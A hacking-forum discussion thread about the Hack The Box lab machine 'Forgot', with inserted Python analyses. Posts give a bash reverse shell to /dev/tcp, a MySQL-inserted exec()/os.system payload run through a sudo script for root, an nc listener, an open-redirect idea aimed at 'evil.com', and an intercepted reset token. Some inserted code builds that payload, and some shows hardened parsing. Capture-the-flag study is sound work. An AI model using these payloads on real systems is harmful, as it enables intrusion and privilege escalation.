Forgot - HTB [Discussion]
(November 16, 2022, 07:21 AM)CyberBandit Wrote:
(November 16, 2022, 05:29 AM)Cy6erf0x Wrote: For root:
First get two ssh sessions.

Create the /dev/shm/kk.sh script. Something like this:

#!/bin/bash
# reverse shell back to the listener; replace 10.0.0.1 with your own address
bash -i >& /dev/tcp/10.0.0.1/4443 0>&1


chmod 777 /dev/shm/kk.sh

Read the database creds from /opt/security/ml_security.py and log in to the database. Run these:

use app;

-- the exec() body must be valid Python: "import os" on one line, not split across two;
-- the print() keeps the XSS-looking text inside the row
insert into escalate values ("lol","lol","lol",'hello=exec("""
import os
os.system("/dev/shm/kk.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');


Make a listener:

 nc -nvlp 4443

On the second session just run:

sudo /opt/security/ml_security.py


Is this method for 'root' working for others?

I'm getting the following error running ml_security.pl:

"2022-11-16 07:07:07.010608: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory"


Not working for me. Still trying to figure out how to get a score high enough so eval is used.
Reply
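An added example, written for this page and not taken from the thread or from the box's ml_security.py (which none of the posts show): it builds the fourth-column value from the method quoted above and checks it the way an eval()-based `key=expression` parser would see it, without running the reverse shell. That the script splits the row on the first `=` and eval()s the right-hand side is an assumption drawn from the shape of `hello=exec("""...""")` and from "a score high enough so eval is used"; the `parse_input_exprs_unsafe` function is a stand-in for that pattern, shown next to a literal-only version. The classifier is not reproduced; the bait string is the decoded form of the text in the post, and `/dev/shm/kk.sh` is the script path from the post.

```python
import ast

# Bait text carried in the thread's payload (constructed here in decoded form; the post
# uses it URL-encoded): the row has to look like XSS to the model before the script
# reaches the path that eval()s it.
XSS_BAIT = '<img src="http://imgur.com/bTkSe.png" /><SCRIPT>alert("xss")</SCRIPT>'


def build_reason(script_path, bait=XSS_BAIT):
    """Build the value written to the fourth column: key=<Python expression>.

    exec(...) is a call, so the whole thing is a valid *expression* and survives
    eval(); the triple-quoted body carries the statements that do the work.
    """
    body = (
        "import os\n"                               # one line: a bare 'import' is a SyntaxError
        f"os.system({script_path!r})\n"             # launch the reverse-shell script
        f"print({'&ErrMsg=' + bait!r})\n"           # keeps the XSS-looking text in the row
    )
    return f'hello=exec("""{body}""")'


def validate_reason(reason):
    """Check the payload as an eval()-based key=expr parser would see it, without running it.

    Returns the key, or raises SyntaxError/ValueError. The line-wrapped 'import' / 'os'
    in the forum post fails here: the outer expression is fine, the exec() body is not.
    """
    key, expr = reason.split("=", 1)
    tree = ast.parse(expr, mode="eval")                   # must be a single expression
    call = tree.body
    if not (isinstance(call, ast.Call) and isinstance(call.func, ast.Name)
            and call.func.id == "exec"):
        raise ValueError("expected exec(<string>)")
    if not (call.args and isinstance(call.args[0], ast.Constant)
            and isinstance(call.args[0].value, str)):
        raise ValueError("exec() argument must be a string literal")
    compile(call.args[0].value, "<exec-body>", "exec")    # body must be valid statements
    return key


def reason_is_valid(reason):
    """True if validate_reason() accepts the payload."""
    try:
        validate_reason(reason)
        return True
    except (SyntaxError, ValueError):
        return False


def parse_input_exprs_unsafe(arg_string, namespace):
    """Assumed stand-in (not the box's code) for a 'key=expr;key2=expr2' parser that
    eval()s each value. This is the pattern 'hello=exec(...)' is shaped for."""
    out = {}
    for item in filter(None, arg_string.split(";")):
        key, expr = item.split("=", 1)
        out[key] = eval(expr, namespace)                  # arbitrary code execution
    return out


def parse_input_exprs_safe(arg_string):
    """Hardened variant: only Python literals are accepted, so exec(...) is rejected."""
    out = {}
    for item in filter(None, arg_string.split(";")):
        key, expr = item.split("=", 1)
        out[key] = ast.literal_eval(expr)                 # ValueError on anything but a literal
    return out


if __name__ == "__main__":
    payload = build_reason("/dev/shm/kk.sh")
    print(payload)
    print("valid:", reason_is_valid(payload))
```

The two parsers are the point of the block: whatever the real script does with the row, an eval() of attacker-controlled text is code execution as root once the script runs under sudo, and `ast.literal_eval` is the drop-in that accepts the same `key=value` syntax without executing calls.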
(November 16, 2022, 03:15 PM)nsa_on_tour Wrote:
(November 16, 2022, 07:21 AM)CyberBandit Wrote: [quoted post above]


check the video
Reply
(November 16, 2022, 04:47 PM)Cy6erf0x Wrote:
(November 16, 2022, 03:15 PM)nsa_on_tour Wrote: [quoted post above]

check the video

Unfortunately I don't do social media. I know I'll get a flatmate's insta and look. Thanks.
Reply
I have a question.

Why can't I get the authorization header after inspecting "/admin_tickets" via Burp Suite?

Any advice, guys?
Reply
(November 19, 2022, 03:17 PM)inferno7us Wrote: I have a question.

Why can't I get the authorization header after inspecting "/admin_tickets" via Burp Suite?

Any advice, guys?


They remove the authorization header; you need to somehow bypass the filtered word "http" in the link field of the form at http://10.10.11.188/escalate.

If you bypass it, fire up a webserver/nc listener and capture the admin session id.

from flask import request, render_template
import netifaces as ni
# app, conn (the MySQL connection) and login_required are defined elsewhere in the app; not shown in this excerpt

@app.route('/escalate', methods=['GET','POST'])
@login_required
def escalate():
        if request.method=='GET':
                conn.reconnect()
                c = conn.cursor()
                c.execute('select * from tickets')
                r = c.fetchall()
                return render_template('escalate.html',tickets=r)
        else:
                to = request.form.get('to')
                link = request.form.get('link')
                issue = request.form.get('issue')
                reason = request.form.get('reason')
                # the host check only runs when the link contains 'http' (case-insensitive)
                if 'http' in link.lower():
                        ip = link.split('/')[2]          # third '/'-separated piece, e.g. '10.10.14.5' from 'http://10.10.14.5/x'
                        tun_ip = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']   # the box's own eth0 address
                        if ip!=tun_ip:
                                return 'This request can\'t be reviewed since the issue link is flagged'
                # parameterised insert; column order is (to, issue, link, reason)
                conn.reconnect()
                c = conn.cursor()
                c.execute('insert into escalate values(%s,%s,%s,%s)',(to,issue,link,reason,))
                conn.commit()
                return 'Escalation form submitted to Admin and will be reviewed soon!'
Reply
(November 20, 2022, 04:36 AM)nobushk Wrote:
(November 19, 2022, 03:17 PM)inferno7us Wrote: [quoted post above]

[nobushk's reply and the /escalate route source, quoted above]

I don't know how to bypass http
Reply
Logged in as Robert (admin) and visited the /escalate endpoint. Pointed to my own IP in the Link field, using HTTP to defeat the filter, with a netcat listener running. Intercepted the reset token. When I visit the reset link and set a new password to "boom", it says success. But when I try to log in using the newly set password it doesn't work. Any ideas?

GET /reset?token=nnnLIQ60EjSW1%2FRJIOFHxdhXBaOE7M0QkR3tY0%2FsR3dwPjiywurWQL2FvldSksAgIoQ%2BFUgxn10FMjWcAQgMKw%3D%3D HTTP/1.1
Reply
(November 20, 2022, 06:28 PM)quarantineph2020 Wrote: Logged in as Robert (admin) and visited the /escalate endpoint. Pointed to my own IP in the Link field, using HTTP to defeat the filter, with a netcat listener running. Intercepted the reset token. When I visit the reset link and set a new password to "boom", it says success. But when I try to log in using the newly set password it doesn't work. Any ideas?

GET /reset?token=nnnLIQ60EjSW1%2FRJIOFHxdhXBaOE7M0QkR3tY0%2FsR3dwPjiywurWQL2FvldSksAgIoQ%2BFUgxn10FMjWcAQgMKw%3D%3D HTTP/1.1


Well, it's the username; it changes very fast. You need to try a few times. On the /escalate form, I think it's more an open redirect exploit that defeats the filter, like:
/home?erro=\\\evil.com/path, or something to redirect to the nc listener, because from what I see here: if 'http' in link.lower(): it will convert
our input from the link field to lowercase. Maybe I'm wrong... anyway, this is the worst machine ever from HTB, it crashes all the time...
Reply
(November 20, 2022, 04:36 AM)nobushk Wrote:
(November 19, 2022, 03:17 PM)inferno7us Wrote: [quoted post above]

[nobushk's reply and the /escalate route source, quoted above]

This checks to see if the 'link' field has 'http' in it, then splits the string using '/' as the delimiter and copies the 3rd piece to the variable 'ip'. So if you enter 'http://10.10.0.1' you end up with '10.10.0.1' as the ip variable, which is compared to the tun_ip variable, which should be the IP address of the box. If they're not equal you get the error message returned.

If your link either a) does not contain 'http' or b) passes the validation, the next section just takes the values from the fields, inserts them into the database and commits the changes. I haven't cracked how to get the admin session key yet, but from this code snippet I don't think it has anything to do with bypassing the URL. There are some clues in how it's talking to the database, however. This was helpful, thanks.

Edit: It looks like the fields on that page aren't vulnerable to injection because it uses the placeholder '%s' and passes the tuple containing the values as the second parameter. Back to the drawing board.
Reply
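An added example, not code from the thread or from the box, that re-implements the check from the posted /escalate route against a handful of constructed links and puts a proper URL parse beside it. `TUN_IP` is a hard-coded stand-in for the `ni.ifaddresses('eth0')` lookup, and the sample links are made up. Which links pass the posted check is read directly from that code; that a browser would follow a scheme-relative `//host/path` link from the admin's page is my inference, not something the thread confirms.

```python
from urllib.parse import urlsplit

# Constructed stand-in for ni.ifaddresses('eth0')[ni.AF_INET][0]['addr'] in the posted route
TUN_IP = "10.10.11.188"


def escalate_link_ok(link, tun_ip=TUN_IP):
    """The check from the posted /escalate route, with its behaviour unchanged.

    The host comparison only runs when 'http' appears anywhere in the link
    (case-insensitive), and the 'host' is simply the third '/'-separated piece.
    A link that contains 'http' but fewer than two '/' raises IndexError here,
    exactly as the route would (an unhandled 500).
    """
    if 'http' in link.lower():
        ip = link.split('/')[2]
        if ip != tun_ip:
            return False
    return True


def hardened_link_ok(link, tun_ip=TUN_IP):
    """Replacement check: parse the URL and allow-list both scheme and host.

    urlsplit() drops userinfo when computing .hostname, lower-cases the scheme,
    and yields scheme == '' for a scheme-relative '//host/path', so every
    non-absolute or off-box link is rejected instead of skipped.
    """
    parts = urlsplit(link)
    return parts.scheme in ("http", "https") and parts.hostname == tun_ip


# Constructed inputs: one legitimate link and several ways of pointing the admin elsewhere
SAMPLES = [
    "http://10.10.11.188/tickets/7",    # the only shape the filter means to allow
    "http://10.10.14.5/",               # attacker host: third piece != tun_ip, rejected
    "HTTP://10.10.14.5/",               # upper case does not help, lower() is applied first
    "http://10.10.11.188@10.10.14.5/",  # userinfo trick: third piece is 'user@host', still rejected
    "//10.10.14.5/",                    # no 'http' at all: the check is skipped entirely
    "ftp://10.10.14.5/",                # likewise skipped
]


def audit(samples=SAMPLES):
    """Return (link, passes_posted_check, passes_hardened_check) for each sample."""
    return [(s, escalate_link_ok(s), hardened_link_ok(s)) for s in samples]


if __name__ == "__main__":
    for link, lenient, strict in audit():
        print(f"{link:36} posted={lenient!s:5} hardened={strict}")
```

The gap the table exposes is the one the thread circles around: the posted code validates the host only for links that contain the substring "http", so the filter is a deny-list on one word rather than an allow-list on a parsed URL, and anything the admin's browser will still follow but that lacks that substring goes straight into the table.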
Well, I tried unhex, a function from MySQL... it didn't work because the link field isn't SQL injectable. After that I tried hex/base64 in Python, same result... can anyone please give us a hint? That would be great, thanks.
Reply